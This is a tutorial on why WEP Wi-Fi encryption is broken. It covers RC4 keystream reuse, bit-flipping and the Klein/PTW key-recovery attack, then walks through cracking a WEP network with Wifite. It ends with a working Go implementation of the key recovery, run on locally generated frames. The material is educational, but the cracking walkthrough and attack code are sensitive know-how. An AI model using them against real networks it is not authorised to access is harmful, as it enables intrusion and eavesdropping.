The WEP (Wired Equivalent Privacy) protocol encrypts data transmitted over the air between two devices so that unauthorized users cannot eavesdrop on or intrude into the wireless network. The name suggests a protocol for wired networks, but it is not one: WEP was meant to give a wireless link privacy "equivalent" to that of a wired one. It was created in the early days of wireless networking as the security layer of wireless local area networks (WLANs) and was ratified as part of the original IEEE 802.11 Wi-Fi standard in 1997. Even then the first version of WEP was weak: U.S. export restrictions on cryptography led manufacturers to ship only "64-bit" encryption, which is really a 40-bit secret key plus a 24-bit initialization vector (IV). When the restrictions were lifted the key was lengthened to "128 bits" (a 104-bit secret key plus the same 24-bit IV). A 256-bit variant appeared later, but 128-bit WEP remains the most common. Despite various attempts to improve, work around, or support WEP, it is still very vulnerable, and systems that rely on it should be upgraded; where a security upgrade is not possible, the equipment should be replaced. WEP was officially deprecated in 2004, the year IEEE 802.11i (the basis of WPA2) was ratified. The encryption method is selected in the wireless router's configuration, as shown in Figure 1.

Figure 1 Selecting the encryption mode on a wireless router

1. WEP's insecurity

WEP uses the RC4 encryption algorithm, a stream cipher. A stream cipher expands a short key into a long pseudo-random keystream. The sender XORs the keystream with the plaintext to obtain the ciphertext. The receiver holds the same short key, derives the same keystream, and XORs it with the ciphertext to recover the plaintext. This mode of operation leaves the stream cipher open to several attacks.
If an attacker flips a bit in the ciphertext, the corresponding bit of the plaintext is flipped after decryption. WEP's integrity check value (ICV) does not stop this, because it is a CRC-32, which is linear: the attacker can compute the change the flip causes in the CRC and apply it to the encrypted ICV as well, without knowing the key. In addition, if an eavesdropper intercepts two ciphertexts encrypted with the same keystream, XORing them yields the XOR of the two plaintexts, and from that XOR statistical analysis can recover the plaintexts. The analysis becomes more practical the more ciphertexts share a keystream, and once one plaintext is known all the others follow directly. In WEP this situation arises often: the keystream depends only on the secret key and a 24-bit IV that is sent in clear, so the same keystream recurs after at most 2^24 (about 16.7 million) frames, and much sooner with devices that reset the IV or choose it poorly.

A major flaw in WEP was already known by August 2001, when the cryptographers Scott Fluhrer, Itsik Mantin, and Adi Shamir described weaknesses in RC4's key scheduling in a paper; attackers were thereby able to recover the secret key with some success. In 2005 Andreas Klein published another paper on the RC4 stream cipher that showed further relationships between the RC4 key and its keystream. Researchers at Darmstadt University of Technology (Erik Tews, Ralf-Philipp Weinmann and Andrei Pyshkin) turned this idea into an experiment: with only 40,000 captured data packets a 104-bit WEP key could be recovered in half of the cases, and with 85,000 packets the success rate rose to 95%; the more packets were captured, the easier the recovery became. Capturing 40,000 packets takes less than a minute, and the key computation itself about 3 seconds on a 1.7 GHz Pentium.

The key to recovering a WEP key is therefore to collect enough valid data frames, from each of which the IV and the ciphertext are extracted. The first bytes of the corresponding plaintext are known, because every data frame body starts with the 802.2 logical link control (LLC/SNAP) header: 0xAA 0xAA 0x03 0x00 0x00 0x00 followed by the two-byte EtherType. XORing these known plaintext bytes with the ciphertext gives the first bytes of the WEP keystream for that IV.
The keystream is produced by running RC4's key schedule on IV||key. Because the IV forms the first three bytes of that key and is known, an attacker can simulate the first steps of the key schedule for every captured frame. Klein's correlation relates the i-th keystream byte to the i-th byte of IV||key through that partially known state with a probability of about 1.36/256, instead of the 1/256 expected from a random guess. Each captured frame therefore casts a vote for a candidate value of each secret key byte, and when enough frames with different IVs have been collected the correct byte gathers noticeably more votes than any other. The bytes are recovered one after another, each recovered byte extending the known prefix used for the next. Simply put, the more frames are captured, the higher the probability of recovering the key and the faster the attack finishes.

2. Cracking WEP

Because of these weaknesses, cracking WEP is easy, and many tools do it directly. The following shows how to crack a WEP-encrypted Wi-Fi network. If there is traffic, that is, clients are connected to the wireless network and exchanging data, cracking WEP becomes a matter of seconds. Here a small tool under Kali Linux that wraps the individual commands is used, so there is no need to remember them yourself. Wifite is an automated WEP and WPA cracking tool that runs only on Linux (not on Windows or macOS). It drives the tools of the Aircrack-ng suite and runs automatically after minimal configuration without manual intervention; it can attack several WEP- and WPA-encrypted networks in one run. Run wifite as root in a terminal: it puts the wireless card into monitor mode and starts scanning for nearby wireless networks, as shown in Figure 2.

Figure 2 Entering monitor mode and scanning nearby networks

After choosing a target, press Ctrl+C and enter the number of the selected target, as shown in Figure 3.
Figure 3 Entering the target number

Wifite then captures data packets and attempts to crack the key automatically. In this run the crack succeeded after a little over 10,000 data packets had been captured, taking about a minute, as shown in Figure 4.

Figure 4 Successful crack

The tool introduced above is most useful when there is a lot of traffic, since it can then recover the WEP key quickly. On a quiet WEP network the replay attacks from the Aircrack-ng suite that Wifite drives (for example aireplay-ng ARP request replay) can be used to generate the needed traffic. Wifite can also attack WPA, but there it captures the four-way handshake and runs a dictionary attack, which succeeds only if the passphrase is in the wordlist.
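The weaknesses described in section 1 and the key recovery that Wifite and aircrack-ng automate in section 2, as an added worked example in Go that is not code from the original article or from the Wifite or Aircrack-ng projects. It implements RC4 and the WEP data path (IV||key, CRC-32 ICV), shows the bit-flipping and keystream-reuse problems, recovers keystream bytes from the known LLC/SNAP header, and then recovers a 40-bit key from locally generated frames using Klein's correlation, the statistical core of the Darmstadt (PTW) attack. The key, IVs, SNAP header, random seed and frame count are constructed sample data, and all function names are this example's own. A 40-bit key is used so that the 8 known SNAP bytes supply every keystream byte the attack needs; a 104-bit key needs 15 keystream bytes, which is why the Darmstadt attack targets ARP frames, whose first bytes are predictable.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"hash/crc32"
	"math/rand"
)

// Constructed sample: the 802.2 LLC/SNAP header opening every WEP data frame body carrying IPv4.
var snapIPv4 = []byte{0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00}

func concat(parts ...[]byte) []byte { return bytes.Join(parts, nil) }
func xorBytes(a, b []byte) []byte {
	out := make([]byte, len(a))
	for i := range a { out[i] = a[i] ^ b[i] }
	return out
}
// ksa runs the first `steps` rounds of the RC4 key schedule (256 = full KSA) and returns
// the state S_steps and index j_steps. Go byte arithmetic wraps mod 256 on its own.
func ksa(key []byte, steps int) (S [256]byte, j byte) {
	for i := range S { S[i] = byte(i) }
	for i := 0; i < steps; i++ {
		j += S[i] + key[i%len(key)]
		S[i], S[j] = S[j], S[i]
	}
	return
}
// rc4Keystream returns the first n bytes RC4 outputs (PRGA) for key.
func rc4Keystream(key []byte, n int) []byte {
	S, _ := ksa(key, 256)
	out := make([]byte, n)
	var i, j byte
	for k := range out {
		i++
		j += S[i]
		S[i], S[j] = S[j], S[i]
		out[k] = S[S[i]+S[j]]
	}
	return out
}
// wepEncrypt follows the WEP data path: ICV = CRC-32 of the body (little-endian), then
// body||ICV is XORed with RC4(IV||key). The 3-byte IV travels in clear with the frame.
func wepEncrypt(iv, key, body []byte) []byte {
	icv := make([]byte, 4)
	binary.LittleEndian.PutUint32(icv, crc32.ChecksumIEEE(body))
	plain := concat(body, icv)
	return xorBytes(plain, rc4Keystream(concat(iv, key), len(plain)))
}
// wepDecrypt returns the body and whether its ICV verified.
func wepDecrypt(iv, key, ct []byte) ([]byte, bool) {
	plain := xorBytes(ct, rc4Keystream(concat(iv, key), len(ct)))
	body, icv := plain[:len(plain)-4], plain[len(plain)-4:]
	return body, binary.LittleEndian.Uint32(icv) == crc32.ChecksumIEEE(body)
}
// flipBits XORs delta (one byte per body byte, len(delta) == len(ct)-4) into the ciphertext
// without the key and patches the encrypted ICV so the frame still verifies, using CRC-32
// linearity: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of the same length).
func flipBits(ct, delta []byte) []byte {
	out := append([]byte{}, ct...)
	for i := range delta { out[i] ^= delta[i] }
	fix := crc32.ChecksumIEEE(delta) ^ crc32.ChecksumIEEE(make([]byte, len(delta)))
	for k := 0; k < 4; k++ { out[len(delta)+k] ^= byte(fix >> (8 * k)) }
	return out
}
// frame is the attacker's view of one captured data frame: the clear IV and the keystream
// prefix obtained as ciphertext XOR the known SNAP header.
type frame struct{ iv, ks []byte }
// captureFrames constructs n such frames under random IVs (generated locally, not sniffed).
func captureFrames(key []byte, n int, seed int64) []frame {
	rng, frames := rand.New(rand.NewSource(seed)), make([]frame, n)
	for k := range frames {
		iv := []byte{byte(rng.Intn(256)), byte(rng.Intn(256)), byte(rng.Intn(256))}
		ct := wepEncrypt(iv, key, snapIPv4)
		frames[k] = frame{iv, xorBytes(ct[:len(snapIPv4)], snapIPv4)}
	}
	return frames
}
// kleinRecover recovers keyLen secret key bytes with Klein's correlation (the core of the
// PTW attack): with probability about 1.36/256, K[i] == S_i^-1[i - X[i-1]] - (j_i + S_i[i]),
// where (S_i, j_i) is the KSA state after i rounds, computable from the IV plus the key bytes
// already recovered, and X[i-1] is the i-th keystream byte. Each frame casts one vote per byte.
func kleinRecover(frames []frame, keyLen int) []byte {
	recovered := []byte{}
	for t := 0; t < keyLen; t++ {
		i, votes := 3+t, [256]int{} // i: index of this key byte within IV||key
		for _, f := range frames {
			S, j := ksa(concat(f.iv, recovered), i)
			pos := byte(bytes.IndexByte(S[:], byte(i)-f.ks[i-1])) // S_i^-1[i - X[i-1]]
			votes[pos-(j+S[i])]++
		}
		best := 0
		for c := 1; c < 256; c++ { if votes[c] > votes[best] { best = c } }
		recovered = append(recovered, byte(best))
	}
	return recovered
}

func main() {
	secret := []byte{0x2F, 0x91, 0xC0, 0x55, 0x3E} // constructed 40-bit WEP key
	got := kleinRecover(captureFrames(secret, 200000, 1), len(secret))
	fmt.Printf("recovered key %x, correct: %v\n", got, bytes.Equal(got, secret))
}
```

With 200,000 generated frames the correct candidate wins each vote by a wide margin; lowering the frame count in main shrinks that margin until wrong bytes start to win, which is the "more packets, easier crack" effect the Darmstadt figures describe. The bit-flipping and keystream-reuse properties can be checked with wepEncrypt, flipBits, wepDecrypt and xorBytes on two frames that share an IV.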